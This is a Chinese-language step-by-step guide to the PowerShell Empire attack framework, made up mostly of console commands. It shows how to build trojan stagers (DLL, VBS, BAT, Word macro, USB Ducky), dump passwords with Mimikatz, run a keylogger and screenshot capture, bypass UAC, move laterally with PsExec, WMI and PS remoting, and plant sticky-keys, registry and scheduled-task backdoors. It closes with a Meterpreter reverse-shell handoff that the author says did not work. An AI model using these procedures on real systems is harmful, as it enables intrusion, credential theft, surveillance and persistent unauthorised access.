Powershell攻击指南2——Empire
目录
Empire
1.介绍
2.安装
3.使用监听
4.生成木马
4.1 DLL木马
4.2 launcher
4.3 launcher_vbs木马
4.4 launcher_bat木马
4.5 Macro木马
4.6Ducky
连接主机及基本使用
1.查看已经连接的主机
2.interact命令连接主机
3.信息收集
4.权限提升
5.横向渗透
6.后门
Empire反弹回Metasploit
Empire
1.介绍
Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一-系列功能。Empire实现了无需powershell.exe就可运行PowerShell代理的功能,还可以快速在后期部署漏洞利用模块,
其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等,并且能够躲避网络检测和大部分安全防护工具的查杀,简单来说有点类似于Metasploit,是一个基于PowerShell的远程控制木马。
2.安装
git clone https://github.com/BC-SECURITY/Empire.git
cd Empire
sudo ./setup/install.sh
sudo poetry install
sudo poetry run python empire --rest -n
kali:
sudo apt install powershell-empire3.使用监听
help
3.1输入Listeners进入监听线程界面
listeners
uselistener http
info
3.2配置监听
(Empire: listeners/http) > set Name shuteer
(Empire: listeners/http) > set Port 80
(Empire: listeners/http) > execute
4.生成木马
usestager TAB键查看木马模块
multi通用模块,osx是Mac系统模块
4.1 DLL木马
usestager windows/dll
info
set Listener shuteer
execute
4.2 launcher
launcher powershell shuteer
4.2.2复制powershell命令在目标机器win7执行
4.2.3使用agents模块查看上线机器
agents
rename EWGT63DU us #更改主机名
4.3 launcher_vbs木马
usestager windows/launcher_vbs
set Listener shutteer
info
execute
使用msf上传vbs木马到目标机器并执行
agents查看上线目标
4.4 launcher_bat木马
usestager windows/launcher_bat
info
(Empire: stager/windows/launcher_bat) > set Listener shuteer
(Empire: stager/windows/launcher_bat) > execute
上传木马文件并执行
查看连接
4.2或者将批处理文件插入Office文件中
4.5 Macro木马
(Empire: listeners) > usestager windows/macro
(Empire: stager/windows/macro) > set Listener shuteer
(Empire: stager/windows/macro) > set OutFile /tmp/macro
(Empire: stager/windows/macro) > execute
打开word文件,视图——>宏——>宏的位置——>创建。 删除原来的代码,将生成的宏复制进去。
4.6Ducky
(Empire: agents) > usestager windows/ducky
(Empire: stager/windows/ducky) > set Listener shuteer
(Empire: stager/windows/ducky) > execute
#将生成的代码烧至小黄鸭中,插入目标计算机,就可以反弹回来
连接主机及基本使用
1.查看已经连接的主机
2.interact命令连接主机
(Empire: agents) > interact WIN7
(Empire: WIN7) > help
(Empire: WIN7) > help agentcmds #查看经常使用的命令
3.使用cmd命令
shell net view
4.使用内置的mimikatz抓取hash和密码
mimikatz
(Empire: WIN7) > creds #creds自动过滤和整理用户密码
add export hash krbtgt plaintext remove
creds export /root/pass.csv #保存密码到本地
5.列出丢失或者失效的主机
list stale
remove stale
3.信息收集
1.屏幕截图
(Empire: ZER6XPN7) > usemodule collection/screenshot
(Empire: powershell/collection/screenshot) > info
(Empire: powershell/collection/screenshot) > execute
2.键盘记录
(Empire: ZER6XPN7) > usemodule collection/keylogger
(Empire: powershell/collection/keylogger) > info
(Empire: powershell/collection/keylogger) > run
3.剪贴板记录
(Empire: ZER6XPN7) > usemodule collection/clipboard_monitor
(Empire: powershell/collection/clipboard_monitor) > info
(Empire: powershell/collection/clipboard_monitor) > execute
jobs
(Empire: ZER6XPN7) > jobs kill R8K936
4.查找共享
(Empire: ZER6XPN7) > usemodule situational_awareness/network/powerview/share_finder
(Empire: powershell/situational_awareness/network/powerview/share_finder) > execute
5.收集目标主机的信息
(Empire: ZER6XPN7) > usemodule situational_awareness/host/winenum
(Empire: powershell/situational_awareness/host/winenum) > execute
6.ARP扫描
(Empire: ZER6XPN7) > usemodule situational_awareness/network/arpscan
(Empire: powershell/situational_awareness/network/arpscan) > set Range 192.16.0.100-192.168.0.130
7.DNS信息获取
(Empire: ZER6XPN7) > usemodule situational_awareness/network/reverse_dns
(Empire: powershell/situational_awareness/network/reverse_dns) > execute
8.查找域登录服务器IP
(Empire: agents) > interact LTBXFREM
(Empire: LTBXFREM) > usemodule situational_awareness/network/powerview/user_hunter
(Empire: powershell/situational_awareness/network/powerview/user_hunter) > execute
9.本地管理组访问
(Empire: LTBXFREM) > usemodule situational_awareness/network/powerview/find_localadmin_access
(Empire: powershell/situational_awareness/network/powerview/find_localadmin_access) > execute
10.获取域控制器
(Empire: LTBXFREM) > usemodule situational_awareness/network/powerview/get_domain_controller
(Empire: powershell/situational_awareness/network/powerview/get_domain_controller) > execute
4.权限提升
1.Bypass UAC
(Empire: LTBXFREM) > usemodule privesc/bypassuac
(Empire: powershell/privesc/bypassuac) > info
(Empire: powershell/privesc/bypassuac) > set Listener shuteer
(Empire: powershell/privesc/bypassuac) > execute
[>] Module is not opsec safe, run? [y/N] y
2.bypassuac_wscript——只适用WIN7系统
(Empire: LTBXFREM) > usemodule privesc/bypassuac_wscript
(Empire: powershell/privesc/bypassuac_wscript) > set Listener shuteer
(Empire: powershell/privesc/bypassuac_wscript) > execute
[>] Module is not opsec safe, run? [y/N] y
3.PowerUp
(Empire: LTBXFREM) > usemodule privesc/powerup/allchecks
(Empire: powershell/privesc/powerup/allchecks) > execute
查看当前agents,输入bypassuac test命令提权
4.GPP
(Empire: LTBXFREM) > usemodule privesc/gpp
(Empire: powershell/privesc/gpp) > info
(Empire: powershell/privesc/gpp) > execute
5.横向渗透
1.令牌窃取
(Empire: LTBXFREM) > mimikatz
(Empire: LTBXFREM) > creds
使用pth窃取令牌
使用steal_token窃取令牌
shell dir \\q-PC\c$ #q-PC是主机名
2.会话注入, #域环境
(Empire) > usemodule powershell/management/psinject
(Empire: powershell/management/psinject) > set Agent Yehd2WLS
(Empire: powershell/management/psinject) > set Listener shuteer
(Empire: powershell/management/psinject) > set ProcId 1380
(Empire: powershell/management/psinject) > execute
3.Invoke-PsExec
(Empire: LG39APUV) > usemodule lateral_movement/invoke_psexec
(Empire: powershell/lateral_movement/invoke_psexec) > info
(Empire: powershell/lateral_movement/invoke_psexec) > set ComputerName q-PC.shutter.testlab
(Empire: powershell/lateral_movement/invoke_psexec) > set Listener shuteer
(Empire: powershell/lateral_movement/invoke_psexec) > execute
4.Invoke-WMI
(Empire: agents) > interact LG39APUV
(Empire: LG39APUV) > usemodule lateral_movement/invoke_wmi
(Empire: powershell/lateral_movement/invoke_wmi) > info
(Empire: powershell/lateral_movement/invoke_wmi) > set ComputerName q-PC.shutter.testlab
(Empire: powershell/lateral_movement/invoke_wmi) > set Listener shuteer
(Empire: powershell/lateral_movement/invoke_wmi) > execute5.PowerShell Remoting
(Empire: LG39APUV) > usemodule lateral_movement/invoke_psremoting
(Empire: powershell/lateral_movement/invoke_psremoting) > set ComputerName q-PC.shutter.testlab
(Empire: powershell/lateral_movement/invoke_psremoting) > set Listener shuteer
(Empire: powershell/lateral_movement/invoke_psremoting) > execute
6.后门
1.权限持久性劫持shift后门
(Empire: LG39APUV) > usemodule lateral_movement/invoke_wmi_debugger
(Empire: powershell/lateral_movement/invoke_wmi_debugger) > info
(Empire: powershell/lateral_movement/invoke_wmi_debugger) > set Listener shuteer
(Empire: powershell/lateral_movement/invoke_wmi_debugger) > set ComputerName win7
(Empire: powershell/lateral_movement/invoke_wmi_debugger) > set TargetBinary sethc.exe
(Empire: powershell/lateral_movement/invoke_wmi_debugger) > execute
2.注册表注入后门
(Empire: agents) > interact LG39APUV
(Empire: LG39APUV) > usemodule persistence/userland/registry
(Empire: powershell/persistence/userland/registry) > set Listener shuteer
(Empire: powershell/persistence/userland/registry) > set RegPath HKCU:Software\Microsoft\Windows\CurrentVersion\Run
(Empire: powershell/persistence/userland/registry) > execute
3.计划任务获得系统权限
(Empire: agents) > interact Z5GUXKL9
(Empire: Z5GUXKL9) > usemodule persistence/elevated/schtasks
(Empire: powershell/persistence/elevated/schtasks) > set DailyTime 23:03
(Empire: powershell/persistence/elevated/schtasks) > set Listener shuteer
(Empire: powershell/persistence/elevated/schtasks) > set DailyTime 23:04
(Empire: powershell/persistence/elevated/schtasks) > execute
[>] Module is not opsec safe, run? [y/N] y
Empire反弹回Metasploit
1.在msf设置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LhOST 192.168.0.109
set LPORT 4444
run2.使用usemodule code_execution/invoke_shellcode
(Empire: agents) > interact Z5GUXKL9
(Empire: Z5GUXKL9) > usemodule code_execution/invoke_shellcode
(Empire: powershell/code_execution/invoke_shellcode) > set L
Lhost Listener Lport
(Empire: powershell/code_execution/invoke_shellcode) > set Lhost 192.168.0.109
(Empire: powershell/code_execution/invoke_shellcode) > set Lport 4444
(Empire: powershell/code_execution/invoke_shellcode) > execute
###未能反弹成功,下次再做尝试